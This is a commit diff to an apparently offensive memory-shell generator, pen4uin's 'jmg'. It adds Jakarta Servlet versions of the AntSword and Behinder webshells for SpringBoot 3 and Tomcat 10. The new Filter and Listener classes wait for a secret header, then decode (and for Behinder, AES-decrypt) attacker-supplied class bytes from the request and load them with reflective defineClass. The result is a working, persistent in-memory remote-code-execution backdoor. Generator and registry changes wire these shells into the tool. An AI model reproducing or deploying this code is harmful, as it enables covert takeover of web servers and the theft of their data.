add: 添加对 Jakarta Servlet 的支持（SpringBoot 3.x/Tomcat 10.x）

Author: pen4uin

jmg-antsword/src/main/java/jmg/antsword/generator/AntSwordGenerator.java

@@ -44,6 +44,11 @@ public byte[] modifyShell(String className, AbstractConfig config) {
                 String methodBody = ResponseUtil.getMethodBody(config.getServerType());
                 JavassistUtil.addMethod(ctClass, "getResponseFromRequest", methodBody);
             }
+            if (config.getShellType().equals(Constants.SHELL_JAKARTA_LISTENER)) {
+                String methodBody = ResponseUtil.getMethodBody(config.getServerType());
+                methodBody = methodBody.replace("javax.servlet.", "jakarta.servlet.");
+                JavassistUtil.addMethod(ctClass, "getResponseFromRequest", methodBody);
+            }
             JavassistUtil.removeSourceFileAttribute(ctClass);
             bytes = ctClass.toBytecode();
             ctClass.detach();

jmg-antsword/src/main/java/jmg/antsword/memshell/AntSwordJakartaFilter.java

@@ -0,0 +1,57 @@
+package jmg.antsword.memshell;
+
+import jakarta.servlet.*;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+
+public class AntSwordJakartaFilter implements Filter {
+    public String pass;
+    public String headerName;
+    public String headerValue;
+
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        HttpServletRequest request = (HttpServletRequest) servletRequest;
+        HttpServletResponse response = (HttpServletResponse) servletResponse;
+        try {
+            if (request.getHeader(this.headerName) != null && request.getHeader(this.headerName).contains(this.headerValue)) {
+                String cls = request.getParameter(pass);
+                if (cls != null) {
+                    try {
+                        byte[] data = doBase64Decode(cls);
+                        URLClassLoader classLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
+                        Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+                        method.setAccessible(true);
+                        Class clazz = (Class) method.invoke(classLoader, data, new Integer(0), new Integer(data.length));
+                        clazz.newInstance().equals(new Object[]{request, response});
+                    } catch (Exception var7) {
+                    }
+                }
+            } else {
+                filterChain.doFilter(servletRequest, servletResponse);
+            }
+        } catch (Exception e) {
+            filterChain.doFilter(servletRequest, servletResponse);
+        }
+    }
+
+    public byte[] doBase64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str)));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str)));
+        }
+    }
+
+    public void init(FilterConfig filterConfig) throws ServletException {
+    }
+
+    public void destroy() {
+    }
+}

jmg-antsword/src/main/java/jmg/antsword/memshell/AntSwordJakartaListener.java

@@ -0,0 +1,80 @@
+package jmg.antsword.memshell;
+
+import jakarta.servlet.ServletRequestEvent;
+import jakarta.servlet.ServletRequestListener;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+
+public class AntSwordJakartaListener implements ServletRequestListener {
+    public String pass;
+    public String headerName;
+    public String headerValue;
+
+    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
+    }
+
+    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
+        HttpServletRequest request = (HttpServletRequest) servletRequestEvent.getServletRequest();
+        try {
+            HttpServletResponse response = getResponseFromRequest(request);
+            if (request.getHeader(this.headerName) != null && request.getHeader(this.headerName).contains(this.headerValue)) {
+                String cls = request.getParameter(pass);
+                if (cls != null) {
+                    try {
+                        byte[] data = base64Decode(cls);
+                        URLClassLoader classLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
+                        Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+                        method.setAccessible(true);
+                        Class clazz = (Class) method.invoke(classLoader, data, new Integer(0), new Integer(data.length));
+                        clazz.newInstance().equals(new Object[]{request, response});
+                        response.flushBuffer();
+                    } catch (Exception var7) {
+                    }
+                }
+            }
+
+        } catch (Exception ignored) {
+        }
+    }
+
+    private HttpServletResponse getResponseFromRequest(HttpServletRequest var1) throws Exception {
+        return null;
+    }
+
+    private static synchronized Object getFV(Object var0, String var1) throws Exception {
+        Field var2 = null;
+        Class var3 = var0.getClass();
+
+        while (var3 != Object.class) {
+            try {
+                var2 = var3.getDeclaredField(var1);
+                break;
+            } catch (NoSuchFieldException var5) {
+                var3 = var3.getSuperclass();
+            }
+        }
+
+        if (var2 == null) {
+            throw new NoSuchFieldException(var1);
+        } else {
+            var2.setAccessible(true);
+            return var2.get(var0);
+        }
+    }
+
+    public byte[] base64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str));
+        }
+    }
+
+}

jmg-antsword/src/main/java/jmg/antsword/util/ShellUtil.java

@@ -1,6 +1,8 @@
 package jmg.antsword.util;
 
 import jmg.antsword.memshell.AntSwordFilter;
+import jmg.antsword.memshell.AntSwordJakartaFilter;
+import jmg.antsword.memshell.AntSwordJakartaListener;
 import jmg.antsword.memshell.AntSwordListener;
 import jmg.core.config.Constants;
 
@@ -31,9 +33,13 @@ public static String getShellClassName(String shellName) throws Exception {
     static {
         SHELL_CLASSNAME_MAP.put(AntSwordListener.class.getSimpleName(), AntSwordListener.class.getName());
         SHELL_CLASSNAME_MAP.put(AntSwordFilter.class.getSimpleName(), AntSwordFilter.class.getName());
+        SHELL_CLASSNAME_MAP.put(AntSwordJakartaListener.class.getSimpleName(), AntSwordJakartaListener.class.getName());
+        SHELL_CLASSNAME_MAP.put(AntSwordJakartaFilter.class.getSimpleName(), AntSwordJakartaFilter.class.getName());
         Map<String, String> antSwordMap = new HashMap();
         antSwordMap.put(Constants.SHELL_FILTER,AntSwordFilter.class.getSimpleName());
         antSwordMap.put(Constants.SHELL_LISTENER, AntSwordListener.class.getSimpleName());
+        antSwordMap.put(Constants.SHELL_JAKARTA_FILTER,AntSwordJakartaFilter.class.getSimpleName());
+        antSwordMap.put(Constants.SHELL_JAKARTA_LISTENER, AntSwordJakartaListener.class.getSimpleName());
         toolMap.put(Constants.TOOL_ANTSWORD, antSwordMap);
     }
 

jmg-behinder/src/main/java/jmg/behinder/generator/BehinderGenerator.java

@@ -44,6 +44,11 @@ public byte[] modifyShell(String className, AbstractConfig config) {
                 String methodBody = ResponseUtil.getMethodBody(config.getServerType());
                 JavassistUtil.addMethod(ctClass, "getResponseFromRequest", methodBody);
             }
+            if (config.getShellType().equals(Constants.SHELL_JAKARTA_LISTENER)) {
+                String methodBody = ResponseUtil.getMethodBody(config.getServerType());
+                methodBody = methodBody.replace("javax.servlet.", "jakarta.servlet.");
+                JavassistUtil.addMethod(ctClass, "getResponseFromRequest", methodBody);
+            }
             JavassistUtil.removeSourceFileAttribute(ctClass);
             bytes = ctClass.toBytecode();
             ctClass.detach();

jmg-behinder/src/main/java/jmg/behinder/memshell/BehinderJakartaFilter.java

@@ -0,0 +1,73 @@
+package jmg.behinder.memshell;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+import jakarta.servlet.*;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import jakarta.servlet.http.HttpSession;
+import java.io.IOException;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class BehinderJakartaFilter extends ClassLoader implements Filter {
+    public String pass;
+    public String headerName;
+    public String headerValue;
+
+    public Class g(byte[] b) {
+        return super.defineClass(b, 0, b.length);
+    }
+
+    public BehinderJakartaFilter() {
+    }
+
+    public BehinderJakartaFilter(ClassLoader c) {
+        super(c);
+    }
+
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        HttpServletRequest request = (HttpServletRequest) servletRequest;
+        HttpServletResponse response = (HttpServletResponse) servletResponse;
+
+        try {
+            if (request.getHeader(this.headerName) != null && request.getHeader(this.headerName).contains(this.headerValue)) {
+                HttpSession session = ((HttpServletRequest) servletRequest).getSession();
+                Map obj = new HashMap();
+                obj.put("request", servletRequest);
+                obj.put("response", response);
+                obj.put("session", session);
+
+                // fix: SpringBoot 3.3.3 (Tomcat/10.1.28)
+                // java.lang.NoSuchMethodError: 'void jakarta.servlet.http.HttpSession.putValue(java.lang.String, java.lang.Object)'
+//                session.putValue("u", this.pass);
+                session.setAttribute("u", pass);
+                Cipher c = Cipher.getInstance("AES");
+                c.init(2, new SecretKeySpec(this.pass.getBytes(), "AES"));
+                (new BehinderJakartaFilter(this.getClass().getClassLoader())).g(c.doFinal(this.doBase64Decode(servletRequest.getReader().readLine()))).newInstance().equals(obj);
+            } else {
+                filterChain.doFilter(servletRequest, servletResponse);
+            }
+        } catch (Exception e) {
+            filterChain.doFilter(servletRequest, servletResponse);
+        }
+    }
+
+    public byte[] doBase64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str)));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str)));
+        }
+    }
+
+    public void init(FilterConfig filterConfig) throws ServletException {
+    }
+
+    public void destroy() {
+    }
+}

jmg-behinder/src/main/java/jmg/behinder/memshell/BehinderJakartaListener.java

@@ -0,0 +1,98 @@
+package jmg.behinder.memshell;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+import jakarta.servlet.ServletRequestEvent;
+import jakarta.servlet.ServletRequestListener;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import jakarta.servlet.http.HttpSession;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Map;
+
+public class BehinderJakartaListener extends ClassLoader implements ServletRequestListener {
+    public String pass;
+
+    public String headerName;
+
+    public String headerValue;
+
+
+    public BehinderJakartaListener() {
+    }
+
+    public BehinderJakartaListener(ClassLoader c) {
+        super(c);
+    }
+
+
+    public Class g(byte[] b) {
+        return super.defineClass(b, 0, b.length);
+    }
+
+
+    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
+    }
+
+    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
+        HttpServletRequest request = (HttpServletRequest) servletRequestEvent.getServletRequest();
+        try {
+            if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
+                HttpServletResponse response = this.getResponseFromRequest(request);
+                HttpSession session = request.getSession();
+                Map obj = new HashMap();
+                obj.put("request", request);
+                obj.put("response", response);
+                obj.put("session", session);
+                try {
+//                    session.putValue("u", pass);
+                    session.setAttribute("u", pass);
+                    Cipher c = Cipher.getInstance("AES");
+                    c.init(2, new SecretKeySpec(pass.getBytes(), "AES"));
+                    (new BehinderJakartaListener(this.getClass().getClassLoader())).g(c.doFinal(this.base64Decode(request.getReader().readLine()))).newInstance().equals(obj);
+                } catch (Exception var7) {
+                }
+            }
+        } catch (Exception e) {
+
+        }
+
+    }
+
+    private HttpServletResponse getResponseFromRequest(HttpServletRequest var1) throws Exception {
+        return null;
+    }
+
+    private static synchronized Object getFV(Object var0, String var1) throws Exception {
+        Field var2 = null;
+        Class var3 = var0.getClass();
+
+        while (var3 != Object.class) {
+            try {
+                var2 = var3.getDeclaredField(var1);
+                break;
+            } catch (NoSuchFieldException var5) {
+                var3 = var3.getSuperclass();
+            }
+        }
+
+        if (var2 == null) {
+            throw new NoSuchFieldException(var1);
+        } else {
+            var2.setAccessible(true);
+            return var2.get(var0);
+        }
+    }
+
+    public byte[] base64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str)));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str)));
+        }
+    }
+}

jmg-behinder/src/main/java/jmg/behinder/util/ShellUtil.java

@@ -1,8 +1,6 @@
 package jmg.behinder.util;
 
-import jmg.behinder.memshell.BehinderFilter;
-import jmg.behinder.memshell.BehinderInterceptor;
-import jmg.behinder.memshell.BehinderListener;
+import jmg.behinder.memshell.*;
 import jmg.core.config.Constants;
 
 import java.util.HashMap;
@@ -33,11 +31,15 @@ public static String getShellClassName(String shellName) throws Exception {
         SHELL_CLASSNAME_MAP.put(BehinderListener.class.getSimpleName(), BehinderListener.class.getName());
         SHELL_CLASSNAME_MAP.put(BehinderFilter.class.getSimpleName(), BehinderFilter.class.getName());
         SHELL_CLASSNAME_MAP.put(BehinderInterceptor.class.getSimpleName(), BehinderInterceptor.class.getName());
+        SHELL_CLASSNAME_MAP.put(BehinderJakartaFilter.class.getSimpleName(), BehinderJakartaFilter.class.getName());
+        SHELL_CLASSNAME_MAP.put(BehinderJakartaListener.class.getSimpleName(), BehinderJakartaListener.class.getName());
 
         Map<String, String> behinderMap = new HashMap();
         behinderMap.put(Constants.SHELL_FILTER, BehinderFilter.class.getSimpleName());
         behinderMap.put(Constants.SHELL_LISTENER, BehinderListener.class.getSimpleName());
         behinderMap.put(Constants.SHELL_INTERCEPTOR, BehinderInterceptor.class.getSimpleName());
+        behinderMap.put(Constants.SHELL_JAKARTA_LISTENER, BehinderJakartaListener.class.getSimpleName());
+        behinderMap.put(Constants.SHELL_JAKARTA_FILTER, BehinderJakartaFilter.class.getSimpleName());
         toolMap.put(Constants.TOOL_BEHINDER, behinderMap);
 
     }

jmg-core/pom.xml

@@ -21,6 +21,10 @@
             <artifactId>spring-webflux</artifactId>
             <version>5.3.29</version>
         </dependency>
-
+        <dependency>
+            <groupId>jakarta.servlet</groupId>
+            <artifactId>jakarta.servlet-api</artifactId>
+            <version>5.0.0</version>
+        </dependency>
     </dependencies>
 </project>